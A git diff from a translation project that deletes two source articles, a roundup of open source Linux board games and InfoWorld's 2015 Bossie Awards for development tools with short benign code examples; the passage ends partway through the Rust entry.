-I have always had a fascination with board games, in part because they are a device of social interaction, they challenge the mind and, most importantly, they are great fun to play. In my misspent youth, myself and a group of friends gathered together to escape the horrors of the classroom, and indulge in a little escapism. The time provided an outlet for tension and rivalry. Board games help teach diplomacy, how to make and break alliances, bring families and friends together, and learn valuable lessons.
-
-I had a panache for abstract strategy games such as chess and draughts, as well as word games. I can still never resist a game of Escape from Colditz, a strategy card and dice-based board game, or Risk; two timeless multi-player strategy board games. But Catan remains my favourite board game.
-
-Board games have seen a resurgence in recent years, and Linux has a good range of board games to choose from. There is a credible implementation of Catan called Pioneers. But for my favourite implementations of classic board games to play online, check out the recommendations below.
-
-----------
-
-### TripleA ###
-
-![TripleA in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-TripleA.png)
-
-TripleA is an open source online turn based strategy game. It allows people to implement and play various strategy board games (ie. Axis & Allies). The TripleA engine has full networking support for online play, support for sounds, XML support for game files, and has its own imaging subsystem that allows for customized user editable maps to be used. TripleA is versatile, scalable and robust.
-
-TripleA started out as a World War II simulation, but now includes different conflicts, as well as variations and mods of popular games and maps. TripleA comes with multiple games and over 100 more games can be downloaded from the user community.
-
-Features include:
-
-- Good interface and attractive graphics
-- Optional scenarios
-- Multiplayer games
-- TripleA comes with the following supported games that uses its game engine (just to name a few):
- - Axis & Allies : Classic edition (2nd, 3rd with options enabled)
- - Axis & Allies : Revised Edition
- - Pact of Steel A&A Variant
- - Big World 1942 A&A Variant
- - Four if by Sea
- - Battle Ship Row
- - Capture The Flag
- - Minimap
-- Hot-seat
-- Play By EMail mode allows persons to play a game via EMail without having to be connected to each other online
- - More time to think out moves
- - Only need to come online to send your turn to the next player
- - Dice rolls are done by a dedicated dice server that is independent of TripleA
- - All dice rolls are PGP Verified and email to every player
- - Every move and every dice roll is logged and saved in TripleA's History Window
- - An online game can be later continued under PBEM mode
- - Hard for others to cheat
-- Hosted online lobby
-- Utilities for editing maps
-- Website: [triplea.sourceforge.net][1]
-- Developer: Sean Bridges (original developer), Mark Christopher Duncan
-- License: GNU GPL v2
-- Version Number: 1.8.0.7
-
-----------
-
-### Domination ###
-
-![Domination in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-Domination.png)
-
-Domination is an open source game that shares common themes with the hugely popular Risk board game. It has many game options and includes many maps.
-
-In the classic “World Domination” game of military strategy, you are battling to conquer the world. To win, you must launch daring attacks, defend yourself to all fronts, and sweep across vast continents with boldness and cunning. But remember, the dangers, as well as the rewards, are high. Just when the world is within your grasp, your opponent might strike and take it all away!
-
-Features include:
-
-- Simple to learn
- - Domination - you must occupy all countries on the map, and thereby eliminate all opponents. These can be long, drawn out games
- - Capital - each player has a country they have selected as a Capital. To win the game, you must occupy all Capitals
- - Mission - each player draws a random mission. The first to complete their mission wins. Missions may include the elimination of a certain colour, occupation of a particular continent, or a mix of both
-- Map editor
-- Simple map format
-- Multiplayer network play
-- Single player
-- Hotseat
-- 5 user interfaces
-- Game types:
-- Play online
-- Website: [domination.sourceforge.net][2]
-- Developer: Yura Mamyrin, Christian Weiske, Mike Chaten, and many others
-- License: GNU GPL v3
-- Version Number: 1.1.1.5
-
-----------
-
-### PyChess ###
-
-![Micro-Max in action](http://www.linuxlinks.com/portal/content/reviews/Games/Screenshot-Pychess.jpg)
-
-PyChess is a Gnome inspired chess client written in Python.
-
-The goal of PyChess, is to provide a fully featured, nice looking, easy to use chess client for the gnome-desktop.
-
-The client should be usable both to those totally new to chess, those who want to play an occasional game, and those who wants to use the computer to further enhance their play.
-
-Features include:
-
-- Attractive interface
-- Chess Engine Communication Protocol (CECP) and Univeral Chess Interface (UCI) Engine support
-- Free online play on the Free Internet Chess Server (FICS)
-- Read and writes PGN, EPD and FEN chess file formats
-- Built-in Python based engine
-- Undo and pause functions
-- Board and piece animation
-- Drag and drop
-- Tabbed interface
-- Hints and spyarrows
-- Opening book sidepanel using sqlite
-- Score plot sidepanel
-- "Enter game" in pgn dialog
-- Optional sounds
-- Legal move highlighting
-- Internationalised or figure pieces in notation
-- Website: [www.pychess.org][3]
-- Developer: Thomas Dybdahl Ahle
-- License: GNU GPL v2
-- Version Number: 0.12 Anderssen rc4
-
-----------
-
-### Scrabble ###
-
-![Scrabble in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-Scrabble3D.png)
-
-Scrabble3D is a highly customizable Scrabble game that not only supports Classic Scrabble and Superscrabble but also 3D games and own boards. You can play local against the computer or connect to a game server to find other players.
-
-Scrabble is a board game with the goal to place letters crossword like. Up to four players take part and get a limited amount of letters (usually 7 or 8). Consecutively, each player tries to compose his letters to one or more word combining with the placed words on the game array. The value of the move depends on the letters (rare letter get more points) and bonus fields which multiply the value of a letter or the whole word. The player with most points win.
-
-This idea is extended with Scrabble3D to the third dimension. Of course, a classic game with 15x15 fields or Superscrabble with 21x21 fields can be played and you may configure any field setting by yourself. The game can be played by the provided freeware program against Computer, other local players or via internet. Last but not least it's possible to connect to a game server to find other players and to obtain a rating. Most options are configurable, including the number and valuation of letters, the used dictionary, the language of dialogs and certainly colors, fonts etc.
-
-Features include:
-
-- Configurable board, letterset and design
-- Board in OpenGL graphics with user-definable wavefront model
-- Game against computer with support of multithreading
-- Post-hoc game analysis with calculation of best move by computer
-- Match with other players connected on a game server
-- NSA rating and highscore at game server
-- Time limit of games
-- Localization; use of non-standard digraphs like CH, RR, LL and right to left reading
-- Multilanguage help / wiki
-- Network games are buffered and asynchronous games are possible
-- Running games can be kibitzed
-- International rules including italian "Cambio Secco"
-- Challenge mode, What-if-variant, CLABBERS, etc
-- Website: [sourceforge.net/projects/scrabble][4]
-- Developer: Heiko Tietze
-- License: GNU GPL v3
-- Version Number: 3.1.3
-
-----------
-
-### Backgammon ###
-
-![Backgammon in action](http://www.linuxlinks.com/portal/content/reviews/Games/Screenshot-gnubg.png)
-
-GNU Backgammon (gnubg) is a strong backgammon program (world-class with a bearoff database installed) usable either as an engine by other programs or as a standalone backgammon game. It is able to play and analyze both money games and tournament matches, evaluate and roll out positions, and more.
-
-In addition to supporting simple play, it also has extensive analysis features, a tutor mode, adjustable difficulty, and support for exporting annotated games.
-
-It currently plays at about the level of a championship flight tournament player and is gradually improving.
-
-gnubg can be played on numerous on-line backgammon servers, such as the First Internet Backgammon Server (FIBS).
-
-Features include:
-
-- A command line interface (with full command editing features if GNU readline is available) that lets you play matches and sessions against GNU Backgammon with a rough ASCII representation of the board on text terminals
-- Support for a GTK+ interface with a graphical board window. Both 2D and 3D graphics are available
-- Tournament match and money session cube handling and cubeful play
-- Support for both 1-sided and 2-sided bearoff databases: 1-sided bearoff database for 15 checkers on the first 6 points and optional 2-sided database kept in memory. Optional larger 1-sided and 2-sided databases stored on disk
-- Automated rollouts of positions, with lookahead and race variance reduction where appropriate. Rollouts may be extended
-- Functions to generate legal moves and evaluate positions at varying search depths
-- Neural net functions for giving cubeless evaluations of all other contact and race positions
-- Automatic and manual annotation (analysis and commentary) of games and matches
-- Record keeping of statistics of players in games and matches (both native inside GNU Backgammon and externally using relational databases and Python)
-- Loading and saving analyzed games and matches as .sgf files (Smart Game Format)
-- Exporting positions, games and matches to: (.eps) Encapsulated Postscript, (.gam) Jellyfish Game, (.html) HTML, (.mat) Jellyfish Match, (.pdf) PDF, (.png) Portable Network Graphics, (.pos) Jellyfish Position, (.ps) PostScript, (.sgf) Gnu Backgammon File, (.tex) LaTeX, (.txt) Plain Text, (.txt) Snowie Text
-- Import of matches and positions from a number of file formats: (.bkg) Hans Berliner's BKG Format, (.gam) GammonEmpire Game, (.gam) PartyGammon Game, (.mat) Jellyfish Match, (.pos) Jellyfish Position, (.sgf) Gnu Backgammon File, (.sgg) GamesGrid Save Game, (.tmg) TrueMoneyGames, (.txt) Snowie Text
-- Python Scripting
-- Native language support; 10 languages complete or in progress
-- Website: [www.gnubg.org][5]
-- Developer: Joseph Heled, Oystein Johansen, Jonathan Kinsey, David Montgomery, Jim Segrave, Joern Thyssen, Gary Wong and contributors
-- License: GPL v2
-- Version Number: 1.05.000
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxlinks.com/article/20150830011533893/BoardGames.html
-
-作者:Frazer Kline
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://triplea.sourceforge.net/
-[2]:http://domination.sourceforge.net/
-[3]:http://www.pychess.org/
-[4]:http://sourceforge.net/projects/scrabble/
-[5]:http://www.gnubg.org/
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md b/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md
deleted file mode 100644
index c135ae0832..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md
+++ /dev/null
@@ -1,338 +0,0 @@
-GHLandy Translating
-
-Bossie Awards 2015: The best open source application development tools
-================================================================================
-InfoWorld's top picks among platforms, frameworks, databases, and all the other tools that programmers use
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-app-dev-100613767-orig.jpg)
-
-### The best open source development tools ###
-
-There must be a better way, right? The developers are the ones who find it. This year's winning projects in the application development category include client-side frameworks, server-side frameworks, mobile frameworks, databases, languages, libraries, editors, and yeah, Docker. These are our top picks among all of the tools that make it faster and easier to build better applications.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-docker-100613773-orig.jpg)
-
-### Docker ###
-
-The darling of container fans almost everywhere, [Docker][2] provides a low-overhead way to isolate an application or service’s environment, which serves its stated goal of being an open platform for building, shipping, and running distributed applications. Docker has been widely supported, even among those seeking to replace the Docker container format with an alternative, more secure runtime and format, specifically Rkt and AppC. Heck, Microsoft Visual Studio now supports deploying into a Docker container too.
-
-Docker’s biggest impact has been on virtual machine environments. Since Docker containers run inside the operating system, many more Docker containers than virtual machines can run in a given amount of RAM. This is important because RAM is usually the scarcest and most expensive resource in a virtualized environment.
-
-There are hundreds of thousands of runnable public images on Docker Hub, of which a few hundred are official, and the rest are from the community. You describe Docker images with a Dockerfile and build images locally from the Docker command line. You can add both public and private image repositories to Docker Hub.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-nodejs-iojs-100613778-orig.jpg)
-
-### Node.js and io.js ###
-
-[Node.js][2] -- and its recently reunited fork [io.js][3] -- is a platform built on [Google Chrome's V8 JavaScript runtime][4] for building fast, scalable, network applications. Node uses an event-driven, nonblocking I/O model without threads. In general, Node tends to take less memory and CPU resources than other runtime engines, such as Java and the .Net Framework. For example, a typical Node.js Web server can run well in a 512MB instance on Cloud Foundry or a 512MB Docker container.
-
-The Node repository on GitHub has more than 35,000 stars and more than 8,000 forks. The project, sponsored primarily by Joyent, has more than 600 contributors. Some of the more famous Node applications are 37Signals, [Ancestry.com][5], Chomp, the Wall Street Journal online, FeedHenry, [GE.com][6], Mockingbird, [Pearson.com][7], Shutterstock, and Uber. The popular IoT back-end Node-RED is built on Node, as are many client apps, such as Brackets and Nuclide.
-
--- Martin Heller
-
-![](rticle/2015/09/bossies-2015-angularjs-100613766-orig.jpg)
-
-### AngularJS ###
-
-[AngularJS][8] (or simply Angular, among friends) is a Model-View-Whatever (MVW) JavaScript AJAX framework that extends HTML with markup for dynamic views and data binding. Angular is especially good for developing single-page Web applications and linking HTML forms to models and JavaScript controllers.
-
-The weird sounding Model-View-Whatever pattern is an attempt to include the Model-View-Controller, Model-View-ViewModel, and Model-View-Presenter patterns under one moniker. The differences among these three closely related patterns are the sorts of topics that programmers love to argue about fiercely; the Angular developers decided to opt out of the discussion.
-
-Basically, Angular automatically synchronizes data from your UI (view) with your JavaScript objects (model) through two-way data binding. To help you structure your application better and make it easy to test, AngularJS teaches the browser how to do dependency injection and inversion of control.
-
-Angular was created by Google and open-sourced under the MIT license; there are currently more than 1,200 contributors to the project on GitHub, and the repository has more than 40,000 stars and 18,000 forks. The Angular site lists [210 “neat things” built with Angular][9].
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-react-100613782-orig.jpg)
-
-### React ###
-
-[React][10] is a JavaScript library for building a UI or view, typically for single-page applications. Note that React does not implement anything having to do with a model or controller. React pages can render on the server or the client; rendering on the server (with Node.js) is typically much faster. People often combine React with AngularJS to create complete applications.
-
-React combines JavaScript and HTML in a single file, optionally a JSX component. React fans like the way JSX components combine views and their related functionality in one file, though that flies in the face of the last decade of Web development trends, which were all about separating the markup and the code. React fans also claim that you can’t understand it until you’ve tried it. Perhaps you should; the React repository on GitHub has 26,000 stars.
-
-[React Native][11] implements React with native iOS controls; the React Native command line uses Node and Xcode. [ReactJS.Net][12] integrates React with [ASP.Net][13] and C#. React is available under a BSD license with a patent license grant from Facebook.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-atom-100613768-orig.jpg)
-
-### Atom ###
-
-[Atom][14] is an open source, hackable desktop editor from GitHub, based on Web technologies. It’s a full-featured tool with a fuzzy finder; fast projectwide search and replace; multiple cursors and selections; multiple panes, snippets, code folding; and the ability to import TextMate grammars and themes. Out of the box, Atom displayed proper syntax highlighting for every programming language on which I tried it, except for F# and C#; I fixed that easily by loading those packages from within Atom. Not surprising, Atom has tight integration with GitHub.
-
-The skeleton of Atom has been separated from the guts and called the Electron shell, providing an open source way to build cross-platform desktop apps with Web technologies. Visual Studio Code is built on the Electron shell, as are a number of proprietary and open source apps, including Slack and Kitematic. Facebook Nuclide adds significant functionality to Atom, including remote development and support for Flow, Hack, and Mercurial.
-
-On the downside, updating Atom packages can become painful, especially if you have many of them installed. The Nuclide packages seem to be the worst offenders -- they not only take a long time to update, they run CPU-intensive Node processes to do so.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-brackets-100613769-orig.jpg)
-
-### Brackets ###
-
-[Brackets][15] is a lightweight editor for Web design that Adobe developed and open-sourced, drawing heavily on other open source projects. The idea is to build better tooling for JavaScript, HTML, CSS, and related open Web technologies. Brackets itself is written in JavaScript, HTML, and CSS, and the developers use Brackets to build Brackets. The editor portion is based on another open source project, CodeMirror, and the Brackets native shell is based on Google’s Chromium Embedded Framework.
-
-Brackets features a clean UI, with the ability to open a quick inline editor that displays all of the related CSS for some HTML, or all of the related JavaScript for some scripting, and a live preview for Web pages that you are editing. New in Brackets 1.4 are instant search in files, easier preferences editing, the ability to enable and disable extensions individually, improved text rendering on Macs, and Greek and Cyrillic character support. Last November, Adobe started shipping a preview version of Extract for Brackets, which can pull out design information from Photoshop files, as part of the default download for Brackets.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-typescript-100613786-orig.jpg)
-
-### TypeScript ###
-
-[TypeScript][16] is a portable, duck-typed superset of JavaScript that compiles to plain JavaScript. The goal of the project is to make JavaScript usable for large applications. In pursuit of that goal, TypeScript adds optional types, classes, and modules to JavaScript, and it supports tools for large-scale JavaScript applications. Typing gets rid of some of the nonsensical and potentially buggy default behavior in JavaScript, for example:
-
- > 1 + "1"
- '11'
-
-“Duck” typing means that the type checking focuses on the shape of the data values; TypeScript describes basic types, interfaces, and classes. While the current version of JavaScript does not support traditional, class-based, object-oriented programming, the ECMAScript 6 specification does. TypeScript compiles ES6 classes into plain, compatible JavaScript, with prototype-based objects, unless you enable ES6 output using the `--target` compiler option.
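-
-A small sketch of what the optional types, interfaces, and classes buy you (all names here are illustrative):
-
-    interface Point { x: number; y: number; }
-
-    class Particle implements Point {
-        constructor(public x: number, public y: number) {}
-        translate(dx: number, dy: number): Particle {
-            return new Particle(this.x + dx, this.y + dy);
-        }
-    }
-
-    const p: Point = new Particle(1, 2).translate(3, 4); // OK
-    // new Particle(1, '2'); // compile-time error: '2' is not a number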
-
-Visual Studio includes TypeScript in the box, starting with Visual Studio 2013 Update 2. You can also edit TypeScript in Visual Studio Code, WebStorm, Atom, Sublime Text, and Eclipse.
-
-When using an external JavaScript library, or new host API, you'll need to use a declaration file (.d.ts) to describe the shape of the library. You can often find declaration files in the [DefinitelyTyped][17] repository, either by browsing, using the [TSD definition manager][18], or using NuGet.
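-
-A declaration file contains only shapes, not implementations. A hand-rolled sketch for a small hypothetical library might look like this:
-
-    // tiny-lib.d.ts -- illustrative only, not a real DefinitelyTyped entry.
-    // It tells the compiler what the library exposes, with no code of its own.
-    declare module 'tiny-lib' {
-        export interface Options { retries?: number; }
-        export function fetchJson(url: string, opts?: Options): Promise<any>;
-    }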
-
-TypeScript’s GitHub repository has more than 6,000 stars.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-swagger-100613785-orig.jpg)
-
-### Swagger ###
-
-[Swagger][19] is a language-agnostic interface to RESTful APIs, with tooling that gives you interactive documentation, client SDK generation, and discoverability. It’s one of several recent attempts to codify the description of RESTful APIs, in the spirit of WSDL for XML Web Services (2000) and CORBA for distributed object interfaces (1991).
-
-The tooling makes Swagger especially interesting. [Swagger-UI][20] automatically generates beautiful documentation and a live API sandbox from a Swagger-compliant API. The [Swagger codegen][21] project allows generation of client libraries automatically from a Swagger-compliant server.
-
-[Swagger Editor][22] lets you edit Swagger API specifications in YAML inside your browser and preview the documentation in real time. Valid Swagger JSON descriptions can then be generated and used with the full Swagger tooling.
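-
-Whether written as YAML in the editor or generated as JSON, a Swagger 2.0 description is just structured data. Here is the shape of a minimal one, expressed as a TypeScript object for illustration (the API it describes is made up):
-
-    const spec = {
-        swagger: '2.0',
-        info: { title: 'Pets API', version: '1.0.0' }, // illustrative API
-        paths: {
-            '/pets/{id}': {
-                get: {
-                    parameters: [
-                        { name: 'id', in: 'path', required: true, type: 'string' },
-                    ],
-                    responses: { '200': { description: 'A single pet' } },
-                },
-            },
-        },
-    };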
-
-The [Swagger JS][23] library is a fast way to enable a JavaScript client to communicate with a Swagger-enabled server. Additional clients exist for Clojure, Go, Java, .Net, Node.js, Perl, PHP, Python, Ruby, and Scala.
-
-The [Amazon API Gateway][24] is a managed service for API management at scale. It can import Swagger specifications using an open source [Swagger Importer][25] tool.
-
-Swagger and friends use the Apache 2.0 license.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-polymer-100613781-orig.jpg)
-
-### Polymer ###
-
-The [Polymer][26] library is a lightweight, “sugaring” layer on top of the Web components APIs to help in building your own Web components. It adds several features for greater ease in building complex elements, such as creating custom element registration, adding markup to your element, configuring properties on your element, setting the properties with attributes, data binding with mustache syntax, and internal styling of elements.
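-
-For example, registering a custom element with properties in Polymer 1.x looks roughly like this; the markup half (a <dom-module> template with {{name}} bindings) lives in HTML, and the element name here is illustrative:
-
-    declare const Polymer: (prototype: object) => void; // global from polymer.html
-
-    Polymer({
-        is: 'greeting-card', // the custom element's tag name
-        properties: {
-            // Settable from markup as <greeting-card name="reader">
-            name: { type: String, value: 'world' },
-        },
-    });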
-
-Polymer also includes libraries of prebuilt elements. The Iron library includes elements for working with layout, user input, selection, and scaffolding apps. The Paper elements implement Google's Material Design. The Gold library includes elements for credit card input fields for e-commerce, the Neon elements implement animations, the Platinum library implements push messages and offline caching, and the Google Web Components library is exactly what it says; it includes wrappers for YouTube, Firebase, Google Docs, Hangouts, Google Maps, and Google Charts.
-
-Polymer Molecules are elements that wrap other JavaScript libraries. The only Molecule currently implemented is for marked, a Markdown library. The Polymer repository on GitHub currently has 12,000 stars. The software is distributed under a BSD-style license.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-ionic-100613775-orig.jpg)
-
-### Ionic ###
-
-The [Ionic][27] framework is a front-end SDK for building hybrid mobile apps, using Angular.js and Cordova, PhoneGap, or Trigger.io. Ionic was designed to be similar in spirit to the Android and iOS SDKs, and to do a minimum of DOM manipulation and use hardware-accelerated transitions to keep the rendering speed high. Ionic is focused mainly on the look and feel and UI interaction of your app.
-
-In addition to the framework, Ionic encompasses an ecosystem of mobile development tools and resources. These include Chrome-based tools, Angular extensions for Cordova capabilities, back-end services, a development server, and a shell View App to enable testers to use your Ionic code on their devices without the need for you to distribute beta apps through the App Store or Google Play.
-
-Appery.io integrated Ionic into its low-code builder in July 2015. Ionic’s GitHub repository has more than 18,000 stars and more than 3,000 forks. Ionic is distributed under an MIT license and currently runs in UIWebView for iOS 7 and later, and in Android 4.1 and up.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-cordova-100613771-orig.jpg)
-
-### Cordova ###
-
-[Apache Cordova][28] is the open source project spun off when Adobe acquired PhoneGap from Nitobi. Cordova is a set of device APIs, plus some tooling, that allows a mobile app developer to access native device functionality like the camera and accelerometer from JavaScript. When combined with a UI framework like Angular, it allows a smartphone app to be developed with only HTML, CSS, and JavaScript. By using Cordova plug-ins for multiple devices, you can generate hybrid apps that share a large portion of their code but also have access to a wide range of platform capabilities. The HTML5 markup and code runs in a WebView hosted by the Cordova shell.
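-
-As a sketch of what accessing native functionality from JavaScript looks like, here is the camera plugin (cordova-plugin-camera) being invoked once the native bridge is up; the Camera global is injected by the plugin:
-
-    declare const Camera: any; // global injected by cordova-plugin-camera
-
-    // Cordova fires 'deviceready' when the native APIs become available.
-    document.addEventListener('deviceready', () => {
-        (navigator as any).camera.getPicture(
-            (data: string) => console.log('captured image,', data.length, 'chars'),
-            (err: string) => console.error('camera failed:', err),
-            { quality: 50, destinationType: Camera.DestinationType.DATA_URL });
-    });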
-
-Cordova is one of the cross-platform mobile app options supported by Visual Studio 2015. Several companies offer online builders for Cordova apps, similar to the Adobe PhoneGap Build service. Online builders save you from having to install and maintain most of the device SDKs on which Cordova relies.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-famous-100613774-orig.jpg)
-
-### Famous Engine ###
-
-The high-performance Famo.us JavaScript framework introduced last year has become the [Famous Engine][29] and [Famous Framework][30]. The Famous Engine runs in a mixed mode, with the DOM and WebGL under a single coordinate system. As before, Famous structures applications in a scene graph hierarchy, but now it produces very little garbage (reducing the garbage collector overhead) and sustains 60FPS animations.
-
-The Famous Physics engine has been refactored to its own, fine-grained module so that you can load only the features you need. Other improvements since last year include streamlined eventing, improved sizing, decoupling the scene graph from the rendering pipeline by using a draw command buffer, and switching to a fully open MIT license.
-
-The new Famous Framework is an alpha-stage developer preview built on the Famous Engine; its goal is creating reusable, composable, and interchangeable UI widgets and applications. Eventually, Famous hopes to replace the jQuery UI widgets with Famous Framework widgets, but while it's promising, the Famous Framework is nowhere near production-ready.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-mongodb-rev-100614248-orig.jpg)
-
-### MongoDB ###
-
-[MongoDB][31] is no stranger to the Bossies or to the ever-growing and ever-competitive NoSQL market. If you still aren't familiar with this very popular technology, here's a brief overview: MongoDB is a cross-platform document-oriented database, favoring JSON-like documents with dynamic schemas that make data integration easier and faster.
-
-MongoDB has attractive features, including but not limited to ad hoc queries, flexible indexing, replication, high availability, automatic sharding, load balancing, and aggregation.
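-
-A sketch of that schema flexibility through the official Node.js driver (the 2.x-era callback API; database and field names are illustrative):
-
-    import { MongoClient } from 'mongodb';
-
-    MongoClient.connect('mongodb://localhost:27017/demo', (err, db) => {
-        if (err) throw err;
-        const users = db.collection('users');
-        // Documents of different shapes can share a collection: no schema up front.
-        users.insertMany(
-            [{ name: 'ada', langs: ['js', 'ts'] }, { name: 'grace', admin: true }],
-            () => {
-                // Ad hoc query: matches documents whose langs array contains 'js'.
-                users.find({ langs: 'js' }).toArray((e, docs) => {
-                    console.log(docs);
-                    db.close();
-                });
-            });
-    });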
-
-The big, bold move with [version 3.0 this year][32] was the new WiredTiger storage engine. We can now have document-level locking. This makes “normal” applications a whole lot more scalable and makes MongoDB available to more use cases.
-
-MongoDB has a growing open source ecosystem with such offerings as the [TokuMX engine][33], from the famous MySQL bad boys Percona. The long list of MongoDB customers includes heavy hitters such as Craigslist, eBay, Facebook, Foursquare, Viacom, and the New York Times.
-
--- Andrew Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-couchbase-100614851-orig.jpg)
-
-### Couchbase ###
-
-[Couchbase][34] is another distributed, document-oriented database that has been making waves in the NoSQL world for quite some time now. Couchbase and MongoDB often compete, but they each have their sweet spots. Couchbase tends to outperform MongoDB when more of the work can be done in memory.
-
-Additionally, Couchbase’s mobile features allow you to disconnect and ship a database in compact format. This allows you to scale down as well as up. This is useful not just for mobile devices but also for specialized applications, like shipping medical records across radio waves in Africa.
-
-This year Couchbase added N1QL, a SQL-based query language that did away with Couchbase’s biggest obstacle: the requirement to define static views. The new release also introduced multidimensional scaling. This allows individual scaling of services such as querying, indexing, and data storage to improve performance, instead of adding an entire, duplicate node.
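-
-A sketch of an N1QL query through the Node.js SDK’s 2.x API (bucket, fields, and data model are illustrative):
-
-    import * as couchbase from 'couchbase';
-
-    const cluster = new couchbase.Cluster('couchbase://localhost');
-    const bucket = cluster.openBucket('travel');
-
-    // N1QL: plain SQL over JSON documents, with no static view required.
-    const query = couchbase.N1qlQuery.fromString(
-        "SELECT name, country FROM `travel` WHERE type = 'airline' LIMIT 5");
-
-    bucket.query(query, (err, rows) => {
-        if (err) throw err;
-        rows.forEach((row: any) => console.log(row));
-    });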
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-cassandra-100614852-orig.jpg)
-
-### Cassandra ###
-
-[Cassandra][35] is the other white meat of column family databases. HBase might be included with your favorite Hadoop distribution, but Cassandra is the one people deliberately deploy for specialized applications. There are good reasons for this.
-
-Cassandra was designed for high workloads of both writes and reads where millisecond consistency isn't as important as throughput. HBase is optimized for reads and greater write consistency. To a large degree, Cassandra tends to be used for operational systems and HBase more for data warehouse and batch-system-type use cases.
-
-While Cassandra has not received as much attention as other NoSQL databases and slipped into a quiet period a couple years back, it is widely used and deployed, and it's a great fit for time series, product catalog, recommendations, and other applications. If you want to keep a cluster up “no matter what” with multiple masters and multiple data centers, and you need to scale with lots of reads and lots of writes, Cassandra might just be your Huckleberry.
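-
-A sketch of the time-series pattern through the DataStax Node.js driver (cassandra-driver); the keyspace and table here are assumed to exist already:
-
-    import * as cassandra from 'cassandra-driver';
-
-    const client = new cassandra.Client({
-        contactPoints: ['127.0.0.1'],
-        keyspace: 'metrics', // illustrative keyspace
-    });
-
-    // Typical time-series shape: partition by source, cluster by timestamp, e.g.
-    // CREATE TABLE readings (sensor_id text, ts timestamp, value double,
-    //                        PRIMARY KEY (sensor_id, ts));
-    client.execute(
-        'INSERT INTO readings (sensor_id, ts, value) VALUES (?, ?, ?)',
-        ['sensor-42', new Date(), 21.5],
-        { prepare: true },
-        (err) => { if (err) throw err; });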
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-orientdb-100613780-orig.jpg)
-
-### OrientDB ###
-
-[OrientDB][36] is an interesting hybrid in the NoSQL world, combining features from a document database, where individual documents can have multiple fields without necessarily defining a schema, and a graph database, which consists of a set of nodes and edges. At a basic level, OrientDB considers the document as a vertex, and relationships between fields as graph edges. Because the relationships between elements are part of the record, no costly joins are required when querying data.
-
-Like most databases today, OrientDB offers linear scalability via a distributed architecture. Adding capacity is a matter of simply adding more nodes to the cluster. Queries are written in a variant of SQL that is extended to support graph concepts. It's not exactly SQL, but data analysts shouldn't have too much trouble adapting. Language bindings are available for most commonly used languages, such as R, Scala, .Net, and C, and those integrating OrientDB into their applications will find an active user community to get help from.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-rethinkdb-100613783-orig.jpg)
-
-### RethinkDB ###
-
-[RethinkDB][37] is a scalable, real-time JSON database with the ability to continuously push updated query results to applications that subscribe to changes. There are official RethinkDB drivers for Ruby, Python, and JavaScript/Node.js, and community-supported drivers for more than a dozen other languages, including C#, Go, and PHP.
-
-It’s tempting to confuse RethinkDB with real-time sync APIs, such as Firebase and PubNub. RethinkDB can be run as a cloud service like Firebase and PubNub, but you can also install it on your own hardware or Docker containers. RethinkDB does more than synchronize: You can run arbitrary RethinkDB queries, including table joins, subqueries, geospatial queries, and aggregation. Finally, RethinkDB is designed to be accessed from an application server, not a browser.
-
-Where MongoDB requires you to poll the database to see changes, RethinkDB lets you subscribe to a stream of changes to a query result. You can shard and scale RethinkDB easily, unlike MongoDB. Also unlike relational databases, RethinkDB does not give you full ACID support or strong schema enforcement, although it can perform joins.
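-
-A sketch of subscribing to a changefeed with the official rethinkdb driver for Node.js, assuming a local server and an existing 'scores' table:
-
-    import * as r from 'rethinkdb';
-
-    r.connect({ host: 'localhost', port: 28015 }, (err, conn) => {
-        if (err) throw err;
-        // Running a .changes() query returns a cursor that stays open and
-        // receives an {old_val, new_val} pair each time a row changes.
-        r.table('scores').changes().run(conn, (e, cursor) => {
-            if (e) throw e;
-            cursor.each((ce, change: any) => console.log(change.new_val));
-        });
-    });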
-
-The RethinkDB repository has 10,000 stars on GitHub, a remarkably high number for a database. It is licensed with the Affero GPL 3.0; the drivers are licensed with Apache 2.0.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-rust-100613784-orig.jpg)
-
-### Rust ###
-
-[Rust][38] is a syntactically C-like systems programming language from Mozilla Research that guarantees memory safety and offers painless concurrency (that is, no data races). It does not have a garbage collector and has minimal runtime overhead. Rust is strongly typed with type inference. This is all promising.
-
-Rust was designed for performance. It doesn’t yet demonstrate great performance, however, so now the mantra seems to be that it runs as fast as C++ code that implements all the safety checks built into Rust. I’m not sure whether I believe that, as in many cases the strictest safety checks for C/C++ code are done by static and dynamic analysis and testing, which don’t add any runtime overhead. Perhaps Rust performance will come with time.
-
